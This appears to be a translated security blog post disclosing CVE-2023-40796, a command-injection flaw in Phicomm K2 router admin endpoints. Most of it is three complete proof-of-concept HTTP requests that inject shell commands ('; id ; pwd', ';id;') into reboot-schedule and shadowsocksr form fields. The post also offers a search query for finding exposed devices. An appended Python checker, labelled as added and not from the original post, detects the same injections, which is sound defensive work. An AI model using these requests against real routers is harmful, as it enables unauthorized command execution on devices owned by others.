CVE-2023-40796: Phicomm K2 router remote command execution, with PoC
2023-8-27 10:23:22 Author: 不够安全 Reads: 40

Introduction

The Phicomm K2 uses 802.11ac wireless technology, giving more stable Wi-Fi performance and a stronger, cleaner wireless signal, with dual-band concurrency reaching up to 1200M wireless throughput. To better address signal interference in the home, the K2 uses a dual-band design: the 5G band offers more channels, which effectively reduces interference from surrounding wireless signals and makes data transfer more efficient. In addition, the K2 uses a PA+LNA module from the well-known wireless semiconductor vendor Skyworks; the PA raises wireless transmit power and the LNA reduces noise on the receive side, so both directions benefit: 2.4G wireless performance is 4 times that of an ordinary router, and 5G wireless performance is up to 5 times.

Vulnerability description

The Phicomm K2 router's shadowsocksr.lua, timerbooter.lua and wifireboot.lua do not sanitize the parameters passed to them, which leads to remote command execution.

Affected versions

Per the CVE author: Phicomm K2 V22.6.529.216; other product lines have not yet been verified. My own verification: other versions are affected as well; as long as the vulnerable endpoint exists, the vulnerability is likely present. On some endpoints or versions, the response does not contain the execution result after the payload runs.

Cyberspace mapping

Reply "CVE-2023-40796" to get the cyberspace-mapping search query.

Exploitation

First, log in to the router's admin backend.

Vulnerable endpoint No. 1

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifireboot HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 566
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx.xxx.xxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMxXftWGyzoxhV5cc
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxa404162/admin/wifiset/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id; pwd
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryMxXftWGyzoxhV5cc
Content-Disposition: form-data; name="cururl2"

http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxa4053a404162/admin/wifiset/
------WebKitFormBoundaryMxXftWGyzoxhV5cc--

Vulnerable endpoint No. 2

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa404162/admin/timereboot HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 458
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx.xxx.xxx
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajic
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxa404162/admin/wifiset/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=xxxxxxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="timeRebootEnablestatus"

on
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="timeRebootrange"

00:05; id ; pwd
------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="cururl"

http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxa4053a404162/admin/wifiset/
------WebKitFormBoundaryU9LxasH5JIOWajic--

Vulnerable endpoint No. 3

POST /cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxxxxxxx04162/admin/shadowsocksr/check HTTP/1.1
Host: xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryU9LxasH5JIOWajic
Referer: http://xxx.xxx.xxx/cgi-bin/luci/;stok=7a7e0xxxxxxxxxxxxxxxxa404162/admin/shadowsocksr/status
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sysauth=xxxxxxxxxxxxxxxxxxxx
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close
Content-Length: 143

------WebKitFormBoundaryU9LxasH5JIOWajic
Content-Disposition: form-data; name="set"

;id;
------WebKitFormBoundaryU9LxasH5JIOWajic
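A defensive check for the three endpoints above, added here as an example that is not code from the original post or from the router firmware: it parses the multipart body of a POST to the affected LuCI paths and flags schedule fields that carry shell metacharacters or do not match the HH:MM form a reboot schedule should have. The endpoint and field names are taken from the PoCs above; the HH:MM grammar, the placeholder stok token and the sample bodies are assumptions constructed for this example.

```python
import re

# Endpoints named in the advisory and the form fields the PoCs inject into; the
# HH:MM grammar for schedule fields is an assumption (the Lua handlers are not on the page).
WATCHED_FIELDS = {
    "/admin/wifireboot": {"wifiRebootrange", "wifiRebootendrange"},
    "/admin/timereboot": {"timeRebootrange"},
    "/admin/shadowsocksr/check": {"set"},
}
TIME_RE = re.compile(r"^([01]\d|2[0-3]):[0-5]\d$")
SHELL_META = re.compile(r"[;|&`$(){}<>\r\n]")

def endpoint_of(path: str) -> str:
    """Drop the LuCI prefix and the ;stok=... token, keeping /admin/... ."""
    i = path.find("/admin/")
    return path[i:] if i >= 0 else path

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser returning {field name: value}."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip()
        if not part or part == "--":  # preamble or closing delimiter
            continue
        head, _, value = part.partition("\r\n\r\n")
        m = re.search(r'name="([^"]+)"', head)
        if m:
            fields[m.group(1)] = value.strip()
    return fields

def inspect_request(path: str, boundary: str, body: str) -> list:
    """Findings (field, reason) for one POST; an empty list means it passed."""
    watched = WATCHED_FIELDS.get(endpoint_of(path), set())
    findings = []
    for name, value in parse_multipart(body, boundary).items():
        if name not in watched:
            continue
        if SHELL_META.search(value):
            findings.append((name, "shell metacharacter"))
        elif name.endswith("range") and not TIME_RE.match(value):
            findings.append((name, "not HH:MM"))
    return findings

# Constructed sample traffic modelled on PoC No. 2 above; the stok token is a placeholder.
PATH = "/cgi-bin/luci/;stok=EXAMPLETOKEN/admin/timereboot"
BOUNDARY = "----WebKitFormBoundaryU9LxasH5JIOWajic"
def mkpart(name, value):
    return f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
MALICIOUS_BODY = mkpart("timeRebootEnablestatus", "on") + mkpart("timeRebootrange", "00:05; id ; pwd") + f"--{BOUNDARY}--\r\n"
BENIGN_BODY = mkpart("timeRebootEnablestatus", "on") + mkpart("timeRebootrange", "00:05") + f"--{BOUNDARY}--\r\n"
```

Run as a WAF rule or over captured admin-panel traffic; the same allowlist (reject anything outside HH:MM before it reaches a shell) is the fix the Lua handlers lack.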


For study and exchange only; do not use for illegal activity.


Source: http://mp.weixin.qq.com/s?__biz=Mzg2OTYzNTExNQ==&mid=2247484453&idx=1&sn=187b93c9d40e63930804a66d7ff3aba5&chksm=ce9b4161f9ecc877d7fc85923a6bc11c53ff8ca7430ca7af27a496cc5949666801704e69059d&scene=0&xtrack=1#rd
For takedown requests, contact: admin#unsafe.sh